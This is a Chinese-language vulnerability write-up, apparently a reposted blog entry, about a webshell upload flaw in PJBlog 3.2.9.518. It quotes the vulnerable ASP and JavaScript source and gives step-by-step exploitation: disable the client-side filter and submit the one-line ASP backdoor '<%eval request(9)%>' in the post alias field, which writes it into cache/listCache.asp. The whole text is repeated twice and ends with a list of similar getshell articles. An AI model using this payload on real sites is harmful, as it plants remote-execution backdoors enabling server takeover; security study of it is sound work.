PJBlog 3.2.9.518 getwebshell 漏洞
2012-07-11 10:02
585 查看
版本:PJblog 3.2.9.518(2012/5/9日时为最新版本)
漏洞利用条件:
1、使用全静态模式(默认情况是全静态模式)
2、用户可以发帖(默认普通用户不能发帖,所以有点鸡肋)
漏洞描述:PJblog 3.2.9.518使用js过滤特殊字符,在使用全静态模式下,普通用户发帖即可插入asp一句话木马。
PJblog 3.2.9.518的安全还是非常不错,密码采用了sha1(pass+salt)方式,salt为6位,在这样的情况下,对注入还是非常有效,即使拿到密码也很难破解。
class/cls_logAction.asp部分代码如下:
<%
Class logArticle
………………省略………………
outIndex = outIndex & "[""A"";"&AListC&";("&clearT(AList)&")] " & Chr(13)
outIndex = outIndex & "[""G"";"&GListC&";("&clearT(GList)&")] " & Chr(13)
Dim CateKeys, CateItems, CateHKeys, CateHItems
CateKeys = CateDic.Keys
CateItems = CateDic.Items
CateHKeys = CateHDic.Keys
CateHItems = CateHDic.Items
For i = 0 To CateDic.Count -1
outIndex = outIndex & "["""&CateKeys(i)&""";"&CateHItems(i)&";("&clearT(CateItems(i))&")] " & Chr(13)
Next
SaveList = SaveToFile(outIndex, "cache/listCache.asp")
%>
SaveToFile函数是将outIndex内容写入到cache/listCache.asp中。
blogpost.asp中调用了 logArticle,部分代码如下:
<%
……………………
Set lArticle = New logArticle
lArticle.categoryID = request.Form("log_CateID")
lArticle.logTitle = request.Form("title")
lArticle.logAuthor = memName
lArticle.logEditType = request.Form("log_editType")
lArticle.logIntroCustom = request.Form("log_IntroC")
lArticle.logIntro = request.Form("log_Intro")
lArticle.logWeather = request.Form("log_weather")
lArticle.logLevel = request.Form("log_Level")
lArticle.logCommentOrder = request.Form("log_comorder")
lArticle.logDisableComment = request.Form("log_DisComment")
lArticle.logIsShow = IsShow
lArticle.logIsTop = request.Form("log_IsTop")
lArticle.logIsDraft = request.Form("log_IsDraft")
lArticle.logFrom = request.Form("log_From")
lArticle.logFromURL = request.Form("log_FromURL")
lArticle.logDisableImage = request.Form("log_disImg")
lArticle.logDisableSmile = request.Form("log_DisSM")
lArticle.logDisableURL = request.Form("log_DisURL")
lArticle.logDisableKeyWord = request.Form("log_DisKey")
lArticle.logMessage = request.Form("Message")
lArticle.logTrackback = request.Form("log_Quote")
lArticle.logTags = request.Form("tags")
lArticle.logPubTime = request.Form("PubTime")
lArticle.logPublishTimeType = request.Form("PubTimeType")
If blog_postFile = 2 Then
lArticle.logCname = request.Form("cname")
lArticle.logCtype = request.Form("ctype")
End If
lArticle.logReadpw = pws
lArticle.logPwtips = pwtips
lArticle.logPwtitle = pwtitle
lArticle.logPwcomm = pwcomm
lArticle.logMeta = request.Form("log_Meta")
lArticle.logKeyWords = keyword
lArticle.logDescription = B_description
if request.form("FirstPost") = 1 then
lArticle.isajax = false
lArticle.logIsDraft = false
postLog = lArticle.editLog(request.Form("postbackId"))
else
lArticle.isajax = false
postLog = lArticle.postLog
end if
Set lArticle = Nothing
%>
lArticle.logCname = request.Form(“cname”),并没有过滤”<%” 和”%>”
漏洞利用方法:
1、用户登陆,发表文章,
2、禁止本地js,必须要使用这步,否则你无法输入’<’和’>’,因为作者已经考虑到安全问题,调用common.js本地过滤,
common/common.js 部份内容如下:
1
//创建文件夹规则 example:
2
//<input onblur="ReplaceInput(this,window.event)" onkeyup="ReplaceInput(this,window.event)" />
3
function ReplaceInput(obj, cevent){
4
var str = ["<", ">", "/", "\\", ":", "*", "?", "|", "\"", /[\u4E00-\u9FA5]/g];
5
if(cevent.keyCode != 37 && cevent.keyCode != 39){
6
//obj.value = obj.value.replace(/[\u4E00-\u9FA5]/g,'');
7
for (var i = 0 ; i < str.length ; i++){
8
obj.value = obj.value.replace(str[i], "");
9
}
10
}
11
}
3、在别名处插入<%eval request(9)%>,提交后,即可在cache/listCache.asp中会写入一句话木马,密码为9
临时解决方案,禁止普通用户发帖。
漏洞利用条件:
1、使用全静态模式(默认情况是全静态模式)
2、用户可以发帖(默认普通用户不能发帖,所以有点鸡肋)
漏洞描述:PJblog 3.2.9.518使用js过滤特殊字符,在使用全静态模式下,普通用户发帖即可插入asp一句话木马。
PJblog 3.2.9.518的安全还是非常不错,密码采用了sha1(pass+salt)方式,salt为6位,在这样的情况下,对注入还是非常有效,即使拿到密码也很难破解。
class/cls_logAction.asp部分代码如下:
<%
Class logArticle
………………省略………………
outIndex = outIndex & "[""A"";"&AListC&";("&clearT(AList)&")] " & Chr(13)
outIndex = outIndex & "[""G"";"&GListC&";("&clearT(GList)&")] " & Chr(13)
Dim CateKeys, CateItems, CateHKeys, CateHItems
CateKeys = CateDic.Keys
CateItems = CateDic.Items
CateHKeys = CateHDic.Keys
CateHItems = CateHDic.Items
For i = 0 To CateDic.Count -1
outIndex = outIndex & "["""&CateKeys(i)&""";"&CateHItems(i)&";("&clearT(CateItems(i))&")] " & Chr(13)
Next
SaveList = SaveToFile(outIndex, "cache/listCache.asp")
%>
SaveToFile函数是将outIndex内容写入到cache/listCache.asp中。
blogpost.asp中调用了 logArticle,部分代码如下:
<%
……………………
Set lArticle = New logArticle
lArticle.categoryID = request.Form("log_CateID")
lArticle.logTitle = request.Form("title")
lArticle.logAuthor = memName
lArticle.logEditType = request.Form("log_editType")
lArticle.logIntroCustom = request.Form("log_IntroC")
lArticle.logIntro = request.Form("log_Intro")
lArticle.logWeather = request.Form("log_weather")
lArticle.logLevel = request.Form("log_Level")
lArticle.logCommentOrder = request.Form("log_comorder")
lArticle.logDisableComment = request.Form("log_DisComment")
lArticle.logIsShow = IsShow
lArticle.logIsTop = request.Form("log_IsTop")
lArticle.logIsDraft = request.Form("log_IsDraft")
lArticle.logFrom = request.Form("log_From")
lArticle.logFromURL = request.Form("log_FromURL")
lArticle.logDisableImage = request.Form("log_disImg")
lArticle.logDisableSmile = request.Form("log_DisSM")
lArticle.logDisableURL = request.Form("log_DisURL")
lArticle.logDisableKeyWord = request.Form("log_DisKey")
lArticle.logMessage = request.Form("Message")
lArticle.logTrackback = request.Form("log_Quote")
lArticle.logTags = request.Form("tags")
lArticle.logPubTime = request.Form("PubTime")
lArticle.logPublishTimeType = request.Form("PubTimeType")
If blog_postFile = 2 Then
lArticle.logCname = request.Form("cname")
lArticle.logCtype = request.Form("ctype")
End If
lArticle.logReadpw = pws
lArticle.logPwtips = pwtips
lArticle.logPwtitle = pwtitle
lArticle.logPwcomm = pwcomm
lArticle.logMeta = request.Form("log_Meta")
lArticle.logKeyWords = keyword
lArticle.logDescription = B_description
if request.form("FirstPost") = 1 then
lArticle.isajax = false
lArticle.logIsDraft = false
postLog = lArticle.editLog(request.Form("postbackId"))
else
lArticle.isajax = false
postLog = lArticle.postLog
end if
Set lArticle = Nothing
%>
lArticle.logCname = request.Form(“cname”),并没有过滤”<%” 和”%>”
漏洞利用方法:
1、用户登陆,发表文章,
2、禁止本地js,必须要使用这步,否则你无法输入’<’和’>’,因为作者已经考虑到安全问题,调用common.js本地过滤,
common/common.js 部份内容如下:
1
//创建文件夹规则 example:
2
//<input onblur="ReplaceInput(this,window.event)" onkeyup="ReplaceInput(this,window.event)" />
3
function ReplaceInput(obj, cevent){
4
var str = ["<", ">", "/", "\\", ":", "*", "?", "|", "\"", /[\u4E00-\u9FA5]/g];
5
if(cevent.keyCode != 37 && cevent.keyCode != 39){
6
//obj.value = obj.value.replace(/[\u4E00-\u9FA5]/g,'');
7
for (var i = 0 ; i < str.length ; i++){
8
obj.value = obj.value.replace(str[i], "");
9
}
10
}
11
}
3、在别名处插入<%eval request(9)%>,提交后,即可在cache/listCache.asp中会写入一句话木马,密码为9
临时解决方案,禁止普通用户发帖。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- PJBlog 3.2.9.518 getwebshell 漏洞
- PJBlog 3.2.9.518 getwebshell 漏洞
- Discuz! 7.2以下版本及各uc产品api接口Get webshell漏洞
- 狂盗小说小偷GETshell漏洞
- TIPS:Phpcmd2008 GetWebShell
- Joomla 远程上传漏洞.直接getshell
- DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞
- 74cms某漏洞可导致普通用户getshell
- [代码审计]XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)
- Redis Getshell自动化实践之webshell
- discuz! 7.2 manyou插件暴路径&Get Webshell 0day
- Didcuz memcache+ssrf GETSHELL漏洞解决方法
- Drupal 7.31SQL注入getshell漏洞利用详解及EXP
- dedecms最新版本修改任意管理员漏洞+getshell+exp
- 某信息技术考试系统编辑器漏洞可getshell
- 阿里云提示 Didcuz memcache+ssrf GETSHELL漏洞修复方法
- Discuz!X升级/转换程序GETSHELL漏洞分析
- Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL
- dedecms v5.5 final getwebshell exploit(datalistcp.class.php)
- PHPCMS9.6.0最新版SQL注入和前台GETSHELL漏洞分析 (实验新课)